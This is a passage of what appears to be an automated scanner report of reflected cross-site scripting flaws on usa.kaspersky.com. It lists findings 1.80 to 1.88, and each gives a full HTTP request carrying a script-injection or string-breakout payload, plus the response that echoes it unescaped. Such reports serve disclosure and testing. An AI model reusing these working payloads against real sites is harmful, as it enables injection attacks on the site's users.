Cookie: s_vi=[CS]v1|2731B5C785013339-4000010CE01E480D[CE]; intcamp=INT1673886; NO_CACHE=Y; slider_session=yes; ev5=far%2Bhelp%2Bvirus; __utma=205612169.764119128.1315138485.1315138485.1315138485.1; __utmb=205612169.9.9.1315139091566; __utmc=205612169; __utmz=205612169.1315138485.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); op646kaspersky_us_storepagegum=a01603h0892794r05t3df82794r05y3aoe389; s_cc=true; s_sq=kaspersky-usa%3D%2526pid%253DStore%252520%25257C%252520Kaspersky%252520PURE%252520Total%252520Security%252520%25257C%252520More%252520User%252520Options%2526pidt%253D1%2526oid%253Dhttp%25253A%25252F%25252Fusa.kaspersky.com%25252Fsites%25252Fall%25252Fthemes%25252Fzen%25252Fkaspersky_usatheme%25252Fimages%25252Fadd_to_cart_btn.gif%2526ot%253DIMAGE; gpv_pageName=Store%20%7C%20Kaspersky%20PURE%20Total%20Security%20%7C%20More%20User%20Options; s_nr=1315139121144-New

Response

HTTP/1.1 404 Not Found
Server: Apache
Last-Modified: Sun, 04 Sep 2011 13:12:57 +0000
Cache-Control: no-cache, must-revalidate, post-check=0, pre-check=0
ETag: "1315141977"
Content-Type: text/html; charset=utf-8
Content-Length: 31155
Date: Sun, 04 Sep 2011 13:13:03 GMT
X-Varnish: 1163133233
Age: 0
Via: 1.1 varnish
Connection: keep-alive
X-Varnish-Cache: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr" xmlns:og="ht
...[SNIP]...
'yes') { s.prop4 = " Thank You"; }
s.pageName = s.prop4;
s.eVar44 = s.pageName;
s.hier1 = s.pageName;
s.channel = s.prop1;
s.server=location.hostname;
s.pageName="404:http://usa.kaspersky.com/node60fc8"-alert(1)-"39c8314a1f9f02d6a/12354/lightbox2?pure-pp=https%3A%2F%2Fstore.digitalriver.com%2Fstore%2Fkasperus%2Fen_US%2Fbuy%2FproductID.224976400&x=0&y=0";

/************* DO NOT ALTER ANYTHING BELOW THIS LINE ! **************/
va
...[SNIP]...

1.80. http://usa.kaspersky.com/node/12354/lightbox2 [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://usa.kaspersky.com
Path:	/node/12354/lightbox2

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c717d"-alert(1)-"861f505fc3c was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /nodec717d"-alert(1)-"861f505fc3c/12354/lightbox2 HTTP/1.1
Host: usa.kaspersky.com
Proxy-Connection: keep-alive
Referer: http://usa.kaspersky.com/store/kaspersky-store
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|2731B5C785013339-4000010CE01E480D[CE]; intcamp=INT1673886; op646kaspersky_us_storepagegum=a01603h0892794r05t3df84d5; NO_CACHE=Y; slider_session=yes; ev5=far%2Bhelp%2Bvirus; s_cc=true; __utma=205612169.764119128.1315138485.1315138485.1315138485.1; __utmb=205612169.9.9.1315139091566; __utmc=205612169; __utmz=205612169.1315138485.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); gpv_pageName=Store%20%7C%20Home%20Users%20%7C%20Kaspersky%20Store; s_nr=1315139100971-New; s_sq=kaspersky-usa%3D%2526pid%253DStore%252520%25257C%252520Home%252520Users%252520%25257C%252520Kaspersky%252520Store%2526pidt%253D1%2526oid%253Dfunctiononclick(event)%25257B%252524('%252523pure-users-3y-prices').show()%25253B%252524('%252523pure-users-2y-prices').hide()%25253B%252524('%252523pure-%2526oidt%253D2%2526ot%253DDIV

Response

HTTP/1.1 404 Not Found
Server: Apache
Last-Modified: Sun, 04 Sep 2011 13:08:31 +0000
Cache-Control: no-cache, must-revalidate, post-check=0, pre-check=0
ETag: "1315141711"
Content-Type: text/html; charset=utf-8
Content-Length: 30617
Date: Sun, 04 Sep 2011 13:08:41 GMT
X-Varnish: 1163126048
Age: 0
Via: 1.1 varnish
Connection: keep-alive
X-Varnish-Cache: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr" xmlns:og="ht
...[SNIP]...
'yes') { s.prop4 = " Thank You"; }
s.pageName = s.prop4;
s.eVar44 = s.pageName;
s.hier1 = s.pageName;
s.channel = s.prop1;
s.server=location.hostname;
s.pageName="404:http://usa.kaspersky.com/nodec717d"-alert(1)-"861f505fc3c/12354/lightbox2";

/************* DO NOT ALTER ANYTHING BELOW THIS LINE ! **************/
var s_code=s.t();if(s_code)document.write(s_code)//-->
...[SNIP]...

1.81. http://usa.kaspersky.com/node/12354/lightbox2 [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://usa.kaspersky.com
Path:	/node/12354/lightbox2

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 99bf4"><script>alert(1)</script>4d3ab9eb3b25b2b8b was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /node99bf4"><script>alert(1)</script>4d3ab9eb3b25b2b8b/12354/lightbox2?pure-pp=https%3A%2F%2Fstore.digitalriver.com%2Fstore%2Fkasperus%2Fen_US%2Fbuy%2FproductID.224976400&x=0&y=0 HTTP/1.1
Host: usa.kaspersky.com
Proxy-Connection: keep-alive
Referer: http://usa.kaspersky.com/node/12354/lightbox2
Cache-Control: max-age=0
Origin: http://usa.kaspersky.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|2731B5C785013339-4000010CE01E480D[CE]; intcamp=INT1673886; NO_CACHE=Y; slider_session=yes; ev5=far%2Bhelp%2Bvirus; __utma=205612169.764119128.1315138485.1315138485.1315138485.1; __utmb=205612169.9.9.1315139091566; __utmc=205612169; __utmz=205612169.1315138485.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); op646kaspersky_us_storepagegum=a01603h0892794r05t3df82794r05y3aoe389; s_cc=true; s_sq=kaspersky-usa%3D%2526pid%253DStore%252520%25257C%252520Kaspersky%252520PURE%252520Total%252520Security%252520%25257C%252520More%252520User%252520Options%2526pidt%253D1%2526oid%253Dhttp%25253A%25252F%25252Fusa.kaspersky.com%25252Fsites%25252Fall%25252Fthemes%25252Fzen%25252Fkaspersky_usatheme%25252Fimages%25252Fadd_to_cart_btn.gif%2526ot%253DIMAGE; gpv_pageName=Store%20%7C%20Kaspersky%20PURE%20Total%20Security%20%7C%20More%20User%20Options; s_nr=1315139121144-New

Response

HTTP/1.1 404 Not Found
Server: Apache
Last-Modified: Sun, 04 Sep 2011 13:12:29 +0000
Cache-Control: no-cache, must-revalidate, post-check=0, pre-check=0
ETag: "1315141949"
Content-Type: text/html; charset=utf-8
Content-Length: 31252
Date: Sun, 04 Sep 2011 13:12:33 GMT
X-Varnish: 1163132429
Age: 0
Via: 1.1 varnish
Connection: keep-alive
X-Varnish-Cache: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr" xmlns:og="ht
...[SNIP]...
<link rel="canonical" href="http://usa.kaspersky.com/node99bf4"><script>alert(1)</script>4d3ab9eb3b25b2b8b/12354/lightbox2?pure-pp=https%3A%2F%2Fstore.digitalriver.com%2Fstore%2Fkasperus%2Fen_US%2Fbuy%2FproductID.224976400&x=0&y=0" />
...[SNIP]...

1.82. http://usa.kaspersky.com/node/12354/lightbox2 [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://usa.kaspersky.com
Path:	/node/12354/lightbox2

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2bbd5"><script>alert(1)</script>923210a76f3673d75 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /node/123542bbd5"><script>alert(1)</script>923210a76f3673d75/lightbox2?pure-pp=https%3A%2F%2Fstore.digitalriver.com%2Fstore%2Fkasperus%2Fen_US%2Fbuy%2FproductID.224976400&x=0&y=0 HTTP/1.1
Host: usa.kaspersky.com
Proxy-Connection: keep-alive
Referer: http://usa.kaspersky.com/node/12354/lightbox2
Cache-Control: max-age=0
Origin: http://usa.kaspersky.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|2731B5C785013339-4000010CE01E480D[CE]; intcamp=INT1673886; NO_CACHE=Y; slider_session=yes; ev5=far%2Bhelp%2Bvirus; __utma=205612169.764119128.1315138485.1315138485.1315138485.1; __utmb=205612169.9.9.1315139091566; __utmc=205612169; __utmz=205612169.1315138485.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); op646kaspersky_us_storepagegum=a01603h0892794r05t3df82794r05y3aoe389; s_cc=true; s_sq=kaspersky-usa%3D%2526pid%253DStore%252520%25257C%252520Kaspersky%252520PURE%252520Total%252520Security%252520%25257C%252520More%252520User%252520Options%2526pidt%253D1%2526oid%253Dhttp%25253A%25252F%25252Fusa.kaspersky.com%25252Fsites%25252Fall%25252Fthemes%25252Fzen%25252Fkaspersky_usatheme%25252Fimages%25252Fadd_to_cart_btn.gif%2526ot%253DIMAGE; gpv_pageName=Store%20%7C%20Kaspersky%20PURE%20Total%20Security%20%7C%20More%20User%20Options; s_nr=1315139121144-New

Response

HTTP/1.1 404 Not Found
Server: Apache
Last-Modified: Sun, 04 Sep 2011 13:14:01 +0000
Cache-Control: no-cache, must-revalidate, post-check=0, pre-check=0
ETag: "1315142041"
Content-Type: text/html; charset=utf-8
Content-Length: 30487
Date: Sun, 04 Sep 2011 13:14:08 GMT
X-Varnish: 1163135909
Age: 0
Via: 1.1 varnish
Connection: keep-alive
X-Varnish-Cache: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr" xmlns:og="ht
...[SNIP]...
<link rel="canonical" href="http://usa.kaspersky.com/node/123542bbd5"><script>alert(1)</script>923210a76f3673d75/lightbox2?pure-pp=https%3A%2F%2Fstore.digitalriver.com%2Fstore%2Fkasperus%2Fen_US%2Fbuy%2FproductID.224976400&x=0&y=0" />
...[SNIP]...

1.83. http://usa.kaspersky.com/node/12354/lightbox2 [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://usa.kaspersky.com
Path:	/node/12354/lightbox2

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6a089"><script>alert(1)</script>3c8b24be29a was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /node/123546a089"><script>alert(1)</script>3c8b24be29a/lightbox2 HTTP/1.1
Host: usa.kaspersky.com
Proxy-Connection: keep-alive
Referer: http://usa.kaspersky.com/store/kaspersky-store
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|2731B5C785013339-4000010CE01E480D[CE]; intcamp=INT1673886; op646kaspersky_us_storepagegum=a01603h0892794r05t3df84d5; NO_CACHE=Y; slider_session=yes; ev5=far%2Bhelp%2Bvirus; s_cc=true; __utma=205612169.764119128.1315138485.1315138485.1315138485.1; __utmb=205612169.9.9.1315139091566; __utmc=205612169; __utmz=205612169.1315138485.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); gpv_pageName=Store%20%7C%20Home%20Users%20%7C%20Kaspersky%20Store; s_nr=1315139100971-New; s_sq=kaspersky-usa%3D%2526pid%253DStore%252520%25257C%252520Home%252520Users%252520%25257C%252520Kaspersky%252520Store%2526pidt%253D1%2526oid%253Dfunctiononclick(event)%25257B%252524('%252523pure-users-3y-prices').show()%25253B%252524('%252523pure-users-2y-prices').hide()%25253B%252524('%252523pure-%2526oidt%253D2%2526ot%253DDIV

Response

HTTP/1.1 404 Not Found
Server: Apache
Last-Modified: Sun, 04 Sep 2011 13:10:11 +0000
Cache-Control: no-cache, must-revalidate, post-check=0, pre-check=0
ETag: "1315141811"
Content-Type: text/html; charset=utf-8
Content-Length: 29949
Date: Sun, 04 Sep 2011 13:10:21 GMT
X-Varnish: 1163128976
Age: 0
Via: 1.1 varnish
Connection: keep-alive
X-Varnish-Cache: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr" xmlns:og="ht
...[SNIP]...
<link rel="canonical" href="http://usa.kaspersky.com/node/123546a089"><script>alert(1)</script>3c8b24be29a/lightbox2" />
...[SNIP]...

1.84. http://usa.kaspersky.com/node/12354/lightbox2 [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://usa.kaspersky.com
Path:	/node/12354/lightbox2

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload da3f8"-alert(1)-"318c97f1b524ecda2 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Remediation detail

Request

GET /node/12354da3f8"-alert(1)-"318c97f1b524ecda2/lightbox2?pure-pp=https%3A%2F%2Fstore.digitalriver.com%2Fstore%2Fkasperus%2Fen_US%2Fbuy%2FproductID.224976400&x=0&y=0 HTTP/1.1
Host: usa.kaspersky.com
Proxy-Connection: keep-alive
Referer: http://usa.kaspersky.com/node/12354/lightbox2
Cache-Control: max-age=0
Origin: http://usa.kaspersky.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|2731B5C785013339-4000010CE01E480D[CE]; intcamp=INT1673886; NO_CACHE=Y; slider_session=yes; ev5=far%2Bhelp%2Bvirus; __utma=205612169.764119128.1315138485.1315138485.1315138485.1; __utmb=205612169.9.9.1315139091566; __utmc=205612169; __utmz=205612169.1315138485.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); op646kaspersky_us_storepagegum=a01603h0892794r05t3df82794r05y3aoe389; s_cc=true; s_sq=kaspersky-usa%3D%2526pid%253DStore%252520%25257C%252520Kaspersky%252520PURE%252520Total%252520Security%252520%25257C%252520More%252520User%252520Options%2526pidt%253D1%2526oid%253Dhttp%25253A%25252F%25252Fusa.kaspersky.com%25252Fsites%25252Fall%25252Fthemes%25252Fzen%25252Fkaspersky_usatheme%25252Fimages%25252Fadd_to_cart_btn.gif%2526ot%253DIMAGE; gpv_pageName=Store%20%7C%20Kaspersky%20PURE%20Total%20Security%20%7C%20More%20User%20Options; s_nr=1315139121144-New

Response

HTTP/1.1 404 Not Found
Server: Apache
Last-Modified: Sun, 04 Sep 2011 13:14:25 +0000
Cache-Control: no-cache, must-revalidate, post-check=0, pre-check=0
ETag: "1315142065"
Content-Type: text/html; charset=utf-8
Content-Length: 30390
Date: Sun, 04 Sep 2011 13:14:31 GMT
X-Varnish: 1163136929
Age: 0
Via: 1.1 varnish
Connection: keep-alive
X-Varnish-Cache: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr" xmlns:og="ht
...[SNIP]...
) { s.prop4 = " Thank You"; }
s.pageName = s.prop4;
s.eVar44 = s.pageName;
s.hier1 = s.pageName;
s.channel = s.prop1;
s.server=location.hostname;
s.pageName="404:http://usa.kaspersky.com/node/12354da3f8"-alert(1)-"318c97f1b524ecda2/lightbox2?pure-pp=https%3A%2F%2Fstore.digitalriver.com%2Fstore%2Fkasperus%2Fen_US%2Fbuy%2FproductID.224976400&x=0&y=0";

/************* DO NOT ALTER ANYTHING BELOW THIS LINE ! **************/
var s_co
...[SNIP]...

1.85. http://usa.kaspersky.com/node/12354/lightbox2 [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://usa.kaspersky.com
Path:	/node/12354/lightbox2

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ff38b"-alert(1)-"240ef35a4a3 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /node/12354ff38b"-alert(1)-"240ef35a4a3/lightbox2 HTTP/1.1
Host: usa.kaspersky.com
Proxy-Connection: keep-alive
Referer: http://usa.kaspersky.com/store/kaspersky-store
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|2731B5C785013339-4000010CE01E480D[CE]; intcamp=INT1673886; op646kaspersky_us_storepagegum=a01603h0892794r05t3df84d5; NO_CACHE=Y; slider_session=yes; ev5=far%2Bhelp%2Bvirus; s_cc=true; __utma=205612169.764119128.1315138485.1315138485.1315138485.1; __utmb=205612169.9.9.1315139091566; __utmc=205612169; __utmz=205612169.1315138485.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); gpv_pageName=Store%20%7C%20Home%20Users%20%7C%20Kaspersky%20Store; s_nr=1315139100971-New; s_sq=kaspersky-usa%3D%2526pid%253DStore%252520%25257C%252520Home%252520Users%252520%25257C%252520Kaspersky%252520Store%2526pidt%253D1%2526oid%253Dfunctiononclick(event)%25257B%252524('%252523pure-users-3y-prices').show()%25253B%252524('%252523pure-users-2y-prices').hide()%25253B%252524('%252523pure-%2526oidt%253D2%2526ot%253DDIV

Response

HTTP/1.1 404 Not Found
Server: Apache
Last-Modified: Sun, 04 Sep 2011 13:10:44 +0000
Cache-Control: no-cache, must-revalidate, post-check=0, pre-check=0
ETag: "1315141844"
Content-Type: text/html; charset=utf-8
Content-Length: 29852
Date: Sun, 04 Sep 2011 13:10:50 GMT
X-Varnish: 1163129847
Age: 0
Via: 1.1 varnish
Connection: keep-alive
X-Varnish-Cache: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr" xmlns:og="ht
...[SNIP]...
) { s.prop4 = " Thank You"; }
s.pageName = s.prop4;
s.eVar44 = s.pageName;
s.hier1 = s.pageName;
s.channel = s.prop1;
s.server=location.hostname;
s.pageName="404:http://usa.kaspersky.com/node/12354ff38b"-alert(1)-"240ef35a4a3/lightbox2";

/************* DO NOT ALTER ANYTHING BELOW THIS LINE ! **************/
var s_code=s.t();if(s_code)document.write(s_code)//-->
...[SNIP]...

1.86. http://usa.kaspersky.com/node/12354/lightbox2 [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://usa.kaspersky.com
Path:	/node/12354/lightbox2

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 192f1"><script>alert(1)</script>390a361a01e590170 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /node/12354/lightbox2192f1"><script>alert(1)</script>390a361a01e590170?pure-pp=https%3A%2F%2Fstore.digitalriver.com%2Fstore%2Fkasperus%2Fen_US%2Fbuy%2FproductID.224976400&x=0&y=0 HTTP/1.1
Host: usa.kaspersky.com
Proxy-Connection: keep-alive
Referer: http://usa.kaspersky.com/node/12354/lightbox2
Cache-Control: max-age=0
Origin: http://usa.kaspersky.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|2731B5C785013339-4000010CE01E480D[CE]; intcamp=INT1673886; NO_CACHE=Y; slider_session=yes; ev5=far%2Bhelp%2Bvirus; __utma=205612169.764119128.1315138485.1315138485.1315138485.1; __utmb=205612169.9.9.1315139091566; __utmc=205612169; __utmz=205612169.1315138485.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); op646kaspersky_us_storepagegum=a01603h0892794r05t3df82794r05y3aoe389; s_cc=true; s_sq=kaspersky-usa%3D%2526pid%253DStore%252520%25257C%252520Kaspersky%252520PURE%252520Total%252520Security%252520%25257C%252520More%252520User%252520Options%2526pidt%253D1%2526oid%253Dhttp%25253A%25252F%25252Fusa.kaspersky.com%25252Fsites%25252Fall%25252Fthemes%25252Fzen%25252Fkaspersky_usatheme%25252Fimages%25252Fadd_to_cart_btn.gif%2526ot%253DIMAGE; gpv_pageName=Store%20%7C%20Kaspersky%20PURE%20Total%20Security%20%7C%20More%20User%20Options; s_nr=1315139121144-New

Response

HTTP/1.1 200 OK
Server: Apache
Last-Modified: Sun, 04 Sep 2011 13:15:28 +0000
Cache-Control: no-cache, must-revalidate, post-check=0, pre-check=0
ETag: "1315142128"
Content-Type: text/html; charset=utf-8
Content-Length: 35309
Date: Sun, 04 Sep 2011 13:15:35 GMT
X-Varnish: 1163139026
Age: 0
Via: 1.1 varnish
Connection: keep-alive
X-Varnish-Cache: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr" xmlns:og="ht
...[SNIP]...
<link rel="canonical" href="http://usa.kaspersky.com/node/12354/lightbox2192f1"><script>alert(1)</script>390a361a01e590170?pure-pp=https%3A%2F%2Fstore.digitalriver.com%2Fstore%2Fkasperus%2Fen_US%2Fbuy%2FproductID.224976400&x=0&y=0" />
...[SNIP]...

1.87. http://usa.kaspersky.com/node/12354/lightbox2 [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://usa.kaspersky.com
Path:	/node/12354/lightbox2

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 25387"><script>alert(1)</script>fb612ec141d was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /node/12354/lightbox225387"><script>alert(1)</script>fb612ec141d HTTP/1.1
Host: usa.kaspersky.com
Proxy-Connection: keep-alive
Referer: http://usa.kaspersky.com/store/kaspersky-store
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|2731B5C785013339-4000010CE01E480D[CE]; intcamp=INT1673886; op646kaspersky_us_storepagegum=a01603h0892794r05t3df84d5; NO_CACHE=Y; slider_session=yes; ev5=far%2Bhelp%2Bvirus; s_cc=true; __utma=205612169.764119128.1315138485.1315138485.1315138485.1; __utmb=205612169.9.9.1315139091566; __utmc=205612169; __utmz=205612169.1315138485.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); gpv_pageName=Store%20%7C%20Home%20Users%20%7C%20Kaspersky%20Store; s_nr=1315139100971-New; s_sq=kaspersky-usa%3D%2526pid%253DStore%252520%25257C%252520Home%252520Users%252520%25257C%252520Kaspersky%252520Store%2526pidt%253D1%2526oid%253Dfunctiononclick(event)%25257B%252524('%252523pure-users-3y-prices').show()%25253B%252524('%252523pure-users-2y-prices').hide()%25253B%252524('%252523pure-%2526oidt%253D2%2526ot%253DDIV

Response

HTTP/1.1 200 OK
Server: Apache
Last-Modified: Sun, 04 Sep 2011 13:12:03 +0000
Cache-Control: no-cache, must-revalidate, post-check=0, pre-check=0
ETag: "1315141923"
Content-Type: text/html; charset=utf-8
Content-Length: 35067
Date: Sun, 04 Sep 2011 13:12:10 GMT
X-Varnish: 1163131606
Age: 0
Via: 1.1 varnish
Connection: keep-alive
X-Varnish-Cache: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr" xmlns:og="ht
...[SNIP]...
<link rel="canonical" href="http://usa.kaspersky.com/node/12354/lightbox225387"><script>alert(1)</script>fb612ec141d" />
...[SNIP]...

1.88. http://usa.kaspersky.com/node/12354/lightbox2 [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://usa.kaspersky.com
Path:	/node/12354/lightbox2

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 995fa"><script>alert(1)</script>7517b2c51a6 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /node/12354/lightbox2?995fa"><script>alert(1)</script>7517b2c51a6=1 HTTP/1.1
Host: usa.kaspersky.com
Proxy-Connection: keep-alive
Referer: http://usa.kaspersky.com/store/kaspersky-store
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
